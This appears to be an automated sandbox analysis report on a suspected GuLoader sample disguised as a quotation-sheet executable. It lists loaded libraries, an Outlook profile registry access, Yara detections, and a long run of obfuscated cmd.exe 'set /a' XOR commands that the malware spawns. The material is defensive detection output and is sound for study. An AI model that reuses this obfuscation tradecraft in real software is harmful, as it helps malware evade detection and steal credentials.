Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: edgegdi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: z1QuotationSheetVSAA6656776.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.38293091270.0000000005981000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.38290946612.000000000057E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: z1QuotationSheetVSAA6656776.exe PID: 5544, type: MEMORYSTR
Obfuscated command line found
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177" Jump to behavior
Source: C:\Users\user\Desktop\z1QuotationSheetVSAA6656776.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177" Jump to behavior
Contains functionality to dynamically determine API calls
